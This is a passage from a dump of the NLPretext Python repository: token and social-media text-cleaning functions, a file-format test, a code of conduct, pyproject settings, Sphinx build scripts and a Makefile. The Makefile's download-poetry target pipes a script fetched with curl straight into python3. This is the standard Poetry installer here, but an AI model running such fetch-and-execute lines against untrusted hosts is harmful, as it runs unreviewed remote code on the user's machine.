51 | if custom_stopwords:
52 | stopwords += custom_stopwords
53 | tokens = [word for word in tokens if word not in stopwords]
54 | return tokens
55 |
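# Hedged usage sketch (the exact output depends on the stopword list shipped for
# the requested language):
#
#     remove_stopwords(["I", "like", "when", "you", "move"], lang="en")
#     # -> e.g. ["I", "move"]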
56 |
57 | def remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:
58 | """
59 | Inputs a list of tokens, outputs a list of tokens without those that
60 | include numbers or special characters.
61 | ['foo','bar','124','34euros'] -> ['foo','bar'].
62 |
63 | Parameters
64 | ----------
65 | tokens : list
66 | list of tokens to be cleaned
67 |
68 | Returns
69 | -------
70 | list
71 | list of tokens without tokens with numbers
72 | """
73 | tokens = [word for word in tokens if re.search("[^a-zA-Z]", word) is None]
74 | return tokens
75 |
76 |
77 | def remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:
78 | """
79 | Remove tokens that don't contain any number or letter.
80 | eg. ['foo','bar','---',"'s",'#'] -> ['foo','bar',"'s"].
81 |
82 | Parameters
83 | ----------
84 | tokens : list
85 | list of tokens to be cleaned
86 |
87 | Returns
88 | -------
89 | list
90 | list of tokens, with tokens made only of special characters removed
91 |
92 | """
93 | tokens = [word for word in tokens if re.search("[a-zA-Z0-9]", word)]
94 | return tokens
95 |
96 |
97 | def remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:
98 | """
99 | Function that removes words whose length is less than or equal to a threshold
100 | eg. with threshold 2: ["hello", "my", "name", "is", "John", "Doe"] --> ["hello","name","John","Doe"].
101 |
102 | Parameters
103 | ----------
104 | tokens : list
105 | list of strings
106 | smallwords_threshold: int
107 | length threshold; tokens of this length or shorter are removed
108 |
109 | Returns
110 | -------
111 | list
112 | """
113 | tokens = [word for word in tokens if len(word) > smallwords_threshold]
114 | return tokens
115 |
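# Minimal sketch chaining the cleaners above (illustrative only):
if __name__ == "__main__":
    tokens = ["Hello", "---", "42nd", "world", "!!", "a"]
    tokens = remove_special_caracters_from_tokenslist(tokens)  # drops "---" and "!!"
    tokens = remove_tokens_with_nonletters(tokens)  # drops "42nd"
    tokens = remove_smallwords(tokens, smallwords_threshold=1)  # drops "a"
    print(tokens)  # ["Hello", "world"]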
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Contributor Covenant Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, sex characteristics, gender identity and expression,
9 | level of experience, education, socio-economic status, nationality, personal
10 | appearance, race, religion, or sexual identity and orientation.
11 |
12 | ## Our Standards
13 |
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 |
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 |
23 | Examples of unacceptable behavior by participants include:
24 |
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 | address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 | professional setting
33 |
34 | ## Our Responsibilities
35 |
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 |
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 |
46 | ## Scope
47 |
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 |
55 | ## Enforcement
56 |
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at rafaelle.aygalenq@artefact.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 |
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 |
68 | ## Attribution
69 |
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
72 |
73 | [homepage]: https://www.contributor-covenant.org
74 |
75 | For answers to common questions about this code of conduct, see
76 | https://www.contributor-covenant.org/faq
77 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | SHELL := /usr/bin/env bash
2 |
3 | IMAGE := nlpretext
4 | VERSION := latest
5 |
6 | NO_CHECK_FLAG = || true
7 |
8 | ifeq ($(STRICT), 1)
9 | POETRY_COMMAND_FLAG =
10 | PIP_COMMAND_FLAG =
11 | SAFETY_COMMAND_FLAG =
12 | BANDIT_COMMAND_FLAG =
13 | SECRETS_COMMAND_FLAG =
14 | BLACK_COMMAND_FLAG =
15 | DARGLINT_COMMAND_FLAG =
16 | ISORT_COMMAND_FLAG =
17 | MYPY_COMMAND_FLAG =
18 | else
19 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
20 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
21 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
22 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
23 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
24 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
25 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
26 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
27 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
28 | endif
29 |
30 | ifeq ($(POETRY_STRICT), 1)
31 | POETRY_COMMAND_FLAG =
32 | else ifeq ($(POETRY_STRICT), 0)
33 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
34 | endif
35 |
36 | ifeq ($(PIP_STRICT), 1)
37 | PIP_COMMAND_FLAG =
38 | else ifeq ($(PIP_STRICT), 0)
39 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
40 | endif
41 |
42 | ifeq ($(SAFETY_STRICT), 1)
43 | SAFETY_COMMAND_FLAG =
44 | else ifeq ($(SAFETY_STRICT), 0)
45 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
46 | endif
47 |
48 | ifeq ($(BANDIT_STRICT), 1)
49 | BANDIT_COMMAND_FLAG =
50 | else ifeq ($(BANDIT_STRICT), 0)
51 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
52 | endif
53 |
54 | ifeq ($(SECRETS_STRICT), 1)
55 | SECRETS_COMMAND_FLAG =
56 | else ifeq ($(SECRETS_STRICT), 0)
57 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
58 | endif
59 |
60 | ifeq ($(BLACK_STRICT), 1)
61 | BLACK_COMMAND_FLAG =
62 | else ifeq ($(BLACK_STRICT), 0)
63 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
64 | endif
65 |
66 | ifeq ($(DARGLINT_STRICT), 1)
67 | DARGLINT_COMMAND_FLAG =
68 | else ifeq ($(DARGLINT_STRICT), 0)
69 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
70 | endif
71 |
72 | ifeq ($(ISORT_STRICT), 1)
73 | ISORT_COMMAND_FLAG =
74 | else ifeq ($(ISORT_STRICT), 0)
75 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
76 | endif
77 |
78 | ifeq ($(MYPY_STRICT), 1)
79 | MYPY_COMMAND_FLAG =
80 | else ifeq ($(MYPY_STRICT), 0)
81 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
82 | endif
83 |
84 | .PHONY: download-poetry
85 | download-poetry:
86 | curl -sSL https://install.python-poetry.org | python3 -
87 |
88 | .PHONY: install
89 | install:
90 | poetry env use python3.10
91 | poetry lock -n
92 | poetry install -n
93 | ifneq ($(NO_PRE_COMMIT), 1)
94 | poetry run pre-commit install -t pre-commit -t pre-push
95 | endif
96 |
97 | .PHONY: check-safety
98 | check-safety:
99 | poetry check$(POETRY_COMMAND_FLAG) && \
100 | poetry run pip check$(PIP_COMMAND_FLAG) && \
101 | poetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \
102 | poetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG)
103 |
104 | .PHONY: gitleaks
105 | gitleaks:
106 | commits="$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))"; \
107 | if [ "$${commits}" != "" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi;
108 |
109 | .PHONY: format-code
110 | format-code:
111 | poetry run pre-commit run --all
112 |
113 | .PHONY: test
114 | test:
115 | poetry run pytest
116 |
117 | .PHONY: lint
118 | lint: check-safety format-code test
119 |
120 | # Example: make docker VERSION=latest
121 | # Example: make docker IMAGE=some_name VERSION=1.0.4
122 | .PHONY: docker
123 | docker:
124 | @echo Building docker $(IMAGE):$(VERSION) ...
125 | docker build \
126 | -t $(IMAGE):$(VERSION) . \
127 | -f ./docker/Dockerfile
128 |
129 | # Example: make clean_docker VERSION=latest
130 | # Example: make clean_docker IMAGE=some_name VERSION=1.0.4
131 | .PHONY: clean_docker
132 | clean_docker:
133 | @echo Removing docker $(IMAGE):$(VERSION) ...
134 | docker rmi -f $(IMAGE):$(VERSION)
135 |
136 | .PHONY: clean_build
137 | clean_build:
138 | rm -rf build/
139 |
140 | .PHONY: clean
141 | clean: clean_build clean_docker
142 |
--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | # Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/
2 |
3 | [build-system]
4 | requires = ["poetry_core>=1.0.0"]
5 | build-backend = "poetry.core.masonry.api"
6 |
7 | [tool.poetry]
8 | name = "nlpretext"
9 | version = "1.2.2"
10 | description = "All the goto functions you need to handle NLP use-cases, integrated in NLPretext"
11 | readme = "README.md"
12 | authors = [
13 | "artefactory "
14 | ]
15 | license = "Apache Software License 2.0"
16 | repository = "https://github.com/artefactory/NLPretext"
17 | homepage = "https://github.com/artefactory/NLPretext"
18 |
19 | # Keywords description https://python-poetry.org/docs/pyproject/#keywords
20 | keywords = [] # Update me
21 |
22 | # Pypi classifiers: https://pypi.org/classifiers/
23 | classifiers = [ # Update me
24 | "Development Status :: 3 - Alpha",
25 | "Intended Audience :: Developers",
26 | "Operating System :: OS Independent",
27 | "Topic :: Software Development :: Libraries :: Python Modules",
28 | ]
29 |
30 | [tool.poetry.scripts]
31 | # Entry points for the package https://python-poetry.org/docs/pyproject/#scripts
32 | "nlpretext" = "nlpretext.cli.__main__:app"
33 |
34 | [tool.poetry.dependencies]
35 | python = ">=3.8,<3.11"
36 | typer = {extras = ["all"], version = ">=0.3.2"}
37 | rich = ">=10.1"
38 | chardet = ">=3.0.4"
39 | emoji = ">=2.0.0"
40 | flashtext = ">=2.7"
41 | ftfy = ">=4.2.0"
42 | mosestokenizer = ">=1.1.0"
43 | nlpaug = ">=1.0.1"
44 | nltk = ">=3.4.2"
45 | numpy = "^1.22"
46 | phonenumbers = ">=8.10.12"
47 | regex = ">=2019.8.19"
48 | sacremoses = ">=0.0.13"
49 | scikit-learn = ">=0.23.2, <2"
50 | spacy = ">=3.0.5"
51 | pillow = ">=8.2.1"
52 | thinc = ">=8.0.4"
53 | stop-words = ">=2018.7.23"
54 | pandas = ">=1.3,<3.0"
55 | pyarrow = ">=4.0.0"
56 | fastparquet = ">=0.4.1"
57 | dask = {version = ">=2021.5.0", extras = ["complete"], optional = true}
58 | distributed = {version = ">=2021.5.0", extras = ["complete"], optional = true}
59 | tornado = ">=6.0.3"
60 | torch = {version = "^1.9.0", optional = true}
61 |
62 | [tool.poetry.group.dev.dependencies]
63 | isort = ">=5.8.0"
64 | pyupgrade = ">=2.12.0"
65 | black = ">=20.8b1"
66 | ruff = "^0.1.5"
67 | mypy = ">=0.812"
68 | bandit = ">=1.7.0"
69 | safety = ">=1.10.3"
70 | pytest = ">=6.2.1"
71 | pytest-cov = ">=2.10.1"
72 | coverage = ">=5.3"
73 | pre-commit = ">=2.12.0"
74 | mypy-extensions = ">=0.4.3"
75 | types-emoji = ">=1.2.2"
76 | types-chardet = ">=0.1.3"
77 | types-click = ">=7.1.2"
78 |
79 |
80 | [tool.poetry.group.docs.dependencies]
81 | nbsphinx = ">=0.8.0"
82 | notebook = ">=6.1.5"
83 | Pygments = ">=2.8.0"
84 | recommonmark = ">=0.7.1"
85 | Sphinx = ">=3.5.4"
86 | sphinx-gallery = ">=0.8.1"
87 | sphinxcontrib-applehelp = ">=1.0.2"
88 | sphinxcontrib-devhelp = ">=1.0.2"
89 | sphinxcontrib-htmlhelp = ">=1.0.3"
90 | sphinxcontrib-jsmath = ">=1.0.1"
91 | sphinxcontrib-qthelp = ">=1.0.3"
92 | sphinxcontrib-serializinghtml = ">=1.1.4"
93 | sphinx-autodoc-typehints = ">=1.11.1"
94 | sphinx_rtd_theme = ">=0.5.2"
95 | sphinx-multiversion-pre-post-build = ">=0.2.4"
96 |
97 |
98 | [tool.poetry.extras]
99 | torch = ["torch"]
100 | dask = ["dask", "distributed"]
101 |
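# e.g. `pip install "nlpretext[torch,dask]"` installs the optional torch and dask dependencies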
102 | [tool.black]
103 | # https://github.com/psf/black
104 | line-length = 100
105 | target-version = ["py38"]
106 |
107 | [tool.isort]
108 | # https://github.com/timothycrosley/isort/
109 | profile = "black"
110 | known_typing = "typing,types,typing_extensions,mypy,mypy_extensions"
111 | sections = "FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER"
112 | default_section = "FIRSTPARTY"
113 | force_grid_wrap = 0
114 | line_length = 100
115 |
116 |
117 | [tool.ruff]
118 | ignore = [
119 | "D100",
120 | "D101",
121 | "D106",
122 | "D205",
123 | "D400",
124 | "D415",
125 | "D401",
126 | ]
127 | line-length = 100
128 | select = ["B", "C", "D", "E", "F", "W"]
129 |
130 | [tool.ruff.pydocstyle]
131 | convention = "numpy"
132 |
133 | [tool.ruff.per-file-ignores]
134 | "*cli.py" = ["D", "B008"]
135 | "*__init__.py" = [
136 | "F401",
137 | "D100",
138 | "D101",
139 | "D103",
140 | "D104",
141 | "D105",
142 | "D106",
143 | "D107",
144 | ]
145 | "tests/*" = ["D", "E501"]
146 |
--------------------------------------------------------------------------------
/tests/test_file_loader.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 | import os
17 | import re
18 |
19 | import numpy as np
20 | import pytest
21 | from nlpretext._utils.file_loader import check_text_file_format, detect_encoding
22 |
23 | TESTDOC_LATIN1 = "J'aime les frites bien grasse étalon châpeau!"
24 | TESTDOC_UTF8 = "Un deuxième exemple de texte en utf-8 cette fois!"
25 |
26 |
27 | def create_files():
28 | encoded_s = TESTDOC_LATIN1.encode("latin-1")
29 | with open("testdoc_latin1.txt", "wb") as f:
30 | f.write(encoded_s)
31 |
32 | encoded_s = TESTDOC_UTF8.encode("utf-8")
33 | with open("testdoc_utf8.txt", "wb") as f:
34 | f.write(encoded_s)
35 | return True
36 |
37 |
38 | def test_detect_encoding():
39 | create_files()
40 | expected = {"encoding": "ISO-8859-1", "confidence": 0.73, "language": ""}
41 | result = detect_encoding("testdoc_latin1.txt")
42 | np.testing.assert_equal(result, expected)
43 | remove_files()
44 |
45 |
46 | def remove_files():
47 | os.remove("testdoc_latin1.txt")
48 | os.remove("testdoc_utf8.txt")
49 |
50 |
51 | @pytest.mark.parametrize(
52 | "input_filepath, raising, expected_str",
53 | [
54 | ("hello.csv", False, "csv"),
55 | ("folder/hello.csv", False, "csv"),
56 | ("gs://folder/hello.csv", False, "csv"),
57 | ("s3://folder/hello.csv", False, "csv"),
58 | ("hdfs://folder/hello.csv", False, "csv"),
59 | ("az://folder/hello.csv", False, "csv"),
60 | ("wildcards/*.csv", False, "csv"),
61 | ("compressed/gz/text.csv.gz", False, "csv"),
62 | ("compressed/zip/text.csv.zip", False, "csv"),
63 | (["hello.csv"], False, "csv"),
64 | (["hello.csv", "compressed.csv.gz"], False, "csv"),
65 | (["hello.csv", "other/folder/hello.csv"], False, "csv"),
66 | ("hello.json", False, "json"),
67 | ("folder/hello.json", False, "json"),
68 | ("gs://folder/hello.json", False, "json"),
69 | (["hello.json", "folder/hello.json"], False, "json"),
70 | ("hello.txt", False, "txt"),
71 | ("folder/hello.txt", False, "txt"),
72 | ("gs://folder/hello.txt", False, "txt"),
73 | (["hello.txt", "gs://folder/hello.txt"], False, "txt"),
74 | ("hello.parquet", False, "parquet"),
75 | ("folder/hello.parquet", False, "parquet"),
76 | ("gs://folder/hello.parquet", False, "parquet"),
77 | (["hello.parquet", "gs://folder/hello.parquet"], False, "parquet"),
78 | (
79 | "gs://folder/hello.notaformat",
80 | True,
81 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
82 | ),
83 | (
84 | "gs://folder/hello.gz",
85 | True,
86 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
87 | ),
88 | (
89 | "gs://folder/hello.zip",
90 | True,
91 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
92 | ),
93 | (
94 | "folder/*",
95 | True,
96 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
97 | ),
98 | (
99 | ["hello.txt", "gs://folder/hello.csv"],
100 | True,
101 | re.escape("Multiple file formats found in file path list: ['txt', 'csv']"),
102 | ),
103 | ],
104 | )
105 | def test_check_text_file_format(input_filepath, raising, expected_str):
106 | if raising:
107 | with pytest.raises(ValueError, match=expected_str):
108 | check_text_file_format(input_filepath)
109 | else:
110 | result = check_text_file_format(input_filepath)
111 | assert result == expected_str
112 |
--------------------------------------------------------------------------------
/nlpretext/social/preprocess.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List, Tuple
18 |
19 | import emoji as _emoji
20 | from nlpretext._config import constants
21 | from nlpretext.basic.preprocess import normalize_whitespace
22 |
23 |
24 | def remove_mentions(text: str) -> str:
25 | """
26 | Function that removes words preceded with a '@'.
27 |
28 | Parameters
29 | ----------
30 | text : str
31 |
32 | Returns
33 | -------
34 | string
35 | """
36 | text = normalize_whitespace(constants.AT_PATTERN.sub("", text))
37 | return text
38 |
39 |
40 | def extract_mentions(text: str) -> List[str]:
41 | """
42 | Function that extracts words preceded with a '@'
43 | eg. "I take care of my skin with @thisproduct" --> ["@thisproduct"].
44 |
45 | Parameters
46 | ----------
47 | text : str
48 |
49 | Returns
50 | -------
51 | string
52 | """
53 | return constants.AT_PATTERN.findall(text)
54 |
55 |
56 | def remove_html_tags(text: str) -> str:
57 | """
58 | Function that removes words between < and >.
59 |
60 | Parameters
61 | ----------
62 | text : str
63 |
64 | Returns
65 | -------
66 | string
67 | """
68 | text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub("", text))
69 | return text
70 |
71 |
72 | def remove_emoji(text: str) -> str:
73 | """
74 | Remove emoji from any str by stripping any unicode in the range of Emoji unicode
75 | as defined in the unicode convention:
76 | http://www.unicode.org/emoji/charts/full-emoji-list.html.
77 |
78 | Parameters
79 | ----------
80 | text : str
81 |
82 | Returns
83 | -------
84 | str
85 | """
86 | text = _emoji.replace_emoji(text, "")
87 | return text
88 |
89 |
90 | # TODO: replace mutable default value :
91 | # https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html
92 | def convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (":", ":")) -> str:
93 | """
94 | Convert emoji to their CLDR Short Name, according to the unicode convention
95 | http://www.unicode.org/emoji/charts/full-emoji-list.html
96 | eg. 😀 --> :grinning_face:
97 |
98 | Parameters
99 | ----------
100 | text : str
101 | code_delimiters : tuple of symbols around the emoji code.
102 | eg: (':',':') --> :grinning_face:
103 |
104 | Returns
105 | -------
106 | str
107 | string
108 | """
109 | return _emoji.demojize(text, delimiters=code_delimiters)
110 |
111 |
112 | def extract_emojis(text: str) -> List[str]:
113 | """
114 | Function that extracts emojis from a text and translates them into words
115 | eg. "I take care of my skin 😀 :(" --> [":grinning_face:"].
116 |
117 | Parameters
118 | ----------
119 | text : str
120 |
121 | Returns
122 | -------
123 | list
124 | list of all emojis converted with their unicode conventions
125 | """
126 | emojis_in_text = _emoji.emoji_list(text)
127 | emojis_converted = [
128 | convert_emoji_to_text(emoji_text.get("emoji", "")) for emoji_text in emojis_in_text
129 | ]
130 | return emojis_converted
131 |
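# Hedged usage sketch (short names come from the emoji package's CLDR data):
#
#     extract_emojis("I take care of my skin 😀")
#     # -> [":grinning_face:"]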
132 |
133 | def extract_hashtags(text: str) -> List[str]:
134 | """
135 | Function that extracts words preceded with a '#'
136 | eg. "I take care of my skin #selfcare#selfestim" --> ["#selfcare", "#selfestim"].
137 |
138 | Parameters
139 | ----------
140 | text : str
141 |
142 | Returns
143 | -------
144 | list
145 | list of all hashtags
146 | """
147 | return constants.HASHTAG_PATTERN.findall(text)
148 |
149 |
150 | def remove_hashtag(text: str) -> str:
151 | """
152 | Function that removes words preceded with a '#'
153 | eg. "I take care of my skin #selfcare#selfestim" --> "I take care of my skin".
154 |
155 | Parameters
156 | ----------
157 | text : str
158 |
159 | Returns
160 | -------
161 | str
162 | text of a post without hashtags
163 | """
164 | text = normalize_whitespace(constants.HASHTAG_PATTERN.sub("", text))
165 | return text
166 |
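# Minimal sketch combining the social-media cleaners above (illustrative only):
if __name__ == "__main__":
    post = "Loving this! @brand #selfcare <b>wow</b> 😀"
    print(remove_mentions(post))  # drops "@brand"
    print(extract_hashtags(post))  # e.g. ["#selfcare"]
    print(remove_html_tags(post))  # drops "<b>" and "</b>"
    print(remove_emoji(post))  # drops the emoji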
--------------------------------------------------------------------------------
/docs/make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | REM Command file for Sphinx documentation
4 |
5 | if "%SPHINXBUILD%" == "" (
6 | set SPHINXBUILD=sphinx-build
7 | )
8 | set BUILDDIR=build
9 | set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
10 | if NOT "%PAPER%" == "" (
11 | set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
12 | )
13 |
14 | if "%1" == "" goto help
15 |
16 | if "%1" == "help" (
17 | :help
18 | echo.Please use `make ^<target^>` where ^<target^> is one of
19 | echo. html to make standalone HTML files
20 | echo. dirhtml to make HTML files named index.html in directories
21 | echo. singlehtml to make a single large HTML file
22 | echo. pickle to make pickle files
23 | echo. json to make JSON files
24 | echo. htmlhelp to make HTML files and a HTML help project
25 | echo. qthelp to make HTML files and a qthelp project
26 | echo. devhelp to make HTML files and a Devhelp project
27 | echo. epub to make an epub
28 | echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
29 | echo. text to make text files
30 | echo. man to make manual pages
31 | echo. changes to make an overview over all changed/added/deprecated items
32 | echo. linkcheck to check all external links for integrity
33 | echo. doctest to run all doctests embedded in the documentation if enabled
34 | goto end
35 | )
36 |
37 | if "%1" == "clean" (
38 | for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
39 | del /q /s %BUILDDIR%\*
40 | goto end
41 | )
42 |
43 | if "%1" == "html" (
44 | %SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
45 | echo.
46 | echo.Build finished. The HTML pages are in %BUILDDIR%/html.
47 | goto end
48 | )
49 |
50 | if "%1" == "dirhtml" (
51 | %SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
52 | echo.
53 | echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
54 | goto end
55 | )
56 |
57 | if "%1" == "singlehtml" (
58 | %SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
59 | echo.
60 | echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
61 | goto end
62 | )
63 |
64 | if "%1" == "pickle" (
65 | %SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
66 | echo.
67 | echo.Build finished; now you can process the pickle files.
68 | goto end
69 | )
70 |
71 | if "%1" == "json" (
72 | %SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
73 | echo.
74 | echo.Build finished; now you can process the JSON files.
75 | goto end
76 | )
77 |
78 | if "%1" == "htmlhelp" (
79 | %SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
80 | echo.
81 | echo.Build finished; now you can run HTML Help Workshop with the ^
82 | .hhp project file in %BUILDDIR%/htmlhelp.
83 | goto end
84 | )
85 |
86 | if "%1" == "qthelp" (
87 | %SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
88 | echo.
89 | echo.Build finished; now you can run "qcollectiongenerator" with the ^
90 | .qhcp project file in %BUILDDIR%/qthelp, like this:
91 | echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Mapnik.qhcp
92 | echo.To view the help file:
93 | echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Mapnik.ghc
94 | goto end
95 | )
96 |
97 | if "%1" == "devhelp" (
98 | %SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
99 | echo.
100 | echo.Build finished.
101 | goto end
102 | )
103 |
104 | if "%1" == "epub" (
105 | %SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
106 | echo.
107 | echo.Build finished. The epub file is in %BUILDDIR%/epub.
108 | goto end
109 | )
110 |
111 | if "%1" == "latex" (
112 | %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
113 | echo.
114 | echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
115 | goto end
116 | )
117 |
118 | if "%1" == "text" (
119 | %SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
120 | echo.
121 | echo.Build finished. The text files are in %BUILDDIR%/text.
122 | goto end
123 | )
124 |
125 | if "%1" == "man" (
126 | %SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
127 | echo.
128 | echo.Build finished. The manual pages are in %BUILDDIR%/man.
129 | goto end
130 | )
131 |
132 | if "%1" == "changes" (
133 | %SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
134 | echo.
135 | echo.The overview file is in %BUILDDIR%/changes.
136 | goto end
137 | )
138 |
139 | if "%1" == "linkcheck" (
140 | %SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
141 | echo.
142 | echo.Link check complete; look for any errors in the above output ^
143 | or in %BUILDDIR%/linkcheck/output.txt.
144 | goto end
145 | )
146 |
147 | if "%1" == "doctest" (
148 | %SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
149 | echo.
150 | echo.Testing of doctests in the sources finished, look at the ^
151 | results in %BUILDDIR%/doctest/output.txt.
152 | goto end
153 | )
154 |
155 | :end
156 |
--------------------------------------------------------------------------------
/nlpretext/_utils/phone_number.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | from typing import List, Optional
19 |
20 | import phonenumbers as _phonenumbers
21 | from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY
22 |
23 |
